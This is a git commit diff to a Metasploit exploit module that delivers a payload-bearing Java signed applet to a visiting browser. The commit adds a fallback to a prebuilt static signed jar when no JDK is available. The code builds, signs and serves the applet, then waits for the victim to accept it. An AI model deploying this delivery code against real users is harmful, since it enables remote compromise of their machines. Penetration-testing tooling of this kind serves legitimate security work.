Adds static signed jar and user messages letting them know.
git-svn-id: file:///home/svn/framework3/trunk@8328 4d416f70-5f16-0410-b530-b9f4589650daunstable
natron
parent
42b331b47f
commit
3ecabe1be9
Binary file not shown.
|
|
@ -113,6 +113,16 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# Currently doing all processing in on_request_uri.
|
||||
# If this is too slow, we can move applet generation up here.
|
||||
#
|
||||
|
||||
@use_static = false
|
||||
|
||||
if not @jvm_init
|
||||
print_error
|
||||
print_error "JVM not initialized. You must install the Java Development Kit, the rjb ruby gem, and set the $JAVA_HOME variable."
|
||||
print_error "Falling back to static signed applet. This exploit will still work, but the CERTCN and APPLETNAME variables will be ignored."
|
||||
print_error
|
||||
@use_static = true
|
||||
end
|
||||
super
|
||||
end
|
||||
|
||||
|
|
@ -374,43 +384,52 @@ public class #{datastore['APPLETNAME']} extends Applet
|
|||
end
|
||||
end
|
||||
|
||||
appletcode = get_code(cli)
|
||||
if not @use_static
|
||||
appletcode = get_code(cli)
|
||||
|
||||
print_status "Compiling applet classes..."
|
||||
compile( appletcode['classnames'], appletcode['codefiles'] )
|
||||
print_status "Compiling applet classes..."
|
||||
compile( appletcode['classnames'], appletcode['codefiles'] )
|
||||
|
||||
print_status "Compile completed. Building jar file..."
|
||||
print_status "Compile completed. Building jar file..."
|
||||
|
||||
unsignedjar = "unsigned_#{datastore['APPLETNAME']}.jar"
|
||||
@signedjar = "#{datastore['APPLETNAME']}.jar"
|
||||
unsignedjar = "unsigned_#{datastore['APPLETNAME']}.jar"
|
||||
@signedjar = "#{datastore['APPLETNAME']}.jar"
|
||||
|
||||
build_jar( unsignedjar,
|
||||
[ # Applet
|
||||
datastore['APPLETNAME'] + ".class",
|
||||
# PayloadX class
|
||||
datastore['APPLETNAME'] + "$" + datastore['PAYLOADNAME'] + ".class",
|
||||
# PayloadX StreamConnector for pure Java payload
|
||||
datastore['APPLETNAME'] + "$" + datastore['PAYLOADNAME'] + "$StreamConnector.class" ] )
|
||||
|
||||
print_status "Jar built. Signing..."
|
||||
build_jar( unsignedjar,
|
||||
[ # Applet
|
||||
datastore['APPLETNAME'] + ".class",
|
||||
# PayloadX class
|
||||
datastore['APPLETNAME'] + "$" + datastore['PAYLOADNAME'] + ".class",
|
||||
# PayloadX StreamConnector for pure Java payload
|
||||
datastore['APPLETNAME'] + "$" + datastore['PAYLOADNAME'] + "$StreamConnector.class" ] )
|
||||
|
||||
print_status "Jar built. Signing..."
|
||||
|
||||
sign_jar( datastore['CERTCN'], unsignedjar, @signedjar )
|
||||
|
||||
print_status "Jar signed. Ready to send."
|
||||
else
|
||||
print_status "Using static, signed jar. Ready to send."
|
||||
end
|
||||
|
||||
sign_jar( datastore['CERTCN'], unsignedjar, @signedjar )
|
||||
|
||||
print_status "Jar signed. Ready to send."
|
||||
|
||||
# TODO: gzip data and parse in java
|
||||
send_response_html( cli, generate_html( data, host, port ), { 'Content-Type' => 'text/html' } )
|
||||
return
|
||||
end
|
||||
|
||||
# load the jar file
|
||||
if File.exists? File.join( datastore['JAVACACHE'], @signedjar )
|
||||
path = File.join( datastore['JAVACACHE'], @signedjar )
|
||||
fd = File.open( path, "rb" )
|
||||
if @use_static
|
||||
path = File.join( Msf::Config.install_root, "data", "exploits", "java_signed_applet.jar" )
|
||||
elsif File.exists? File.join( datastore['JAVACACHE'], @signedjar )
|
||||
path = File.join( datastore['JAVACACHE'], @signedjar )
|
||||
end
|
||||
|
||||
if path
|
||||
fd = File.open( path, "rb" )
|
||||
@jar_data = fd.read(fd.stat.size)
|
||||
fd.close
|
||||
end
|
||||
|
||||
|
||||
print_status( "Sending #{datastore['APPLETNAME']}.jar to #{cli.peerhost}:#{cli.peerport}. Waiting for user to click 'accept'..." )
|
||||
send_response( cli, @jar_data, { 'Content-Type' => "application/octet-stream" } )
|
||||
|
||||
|
|
|
|||
Loading…
Reference in New Issue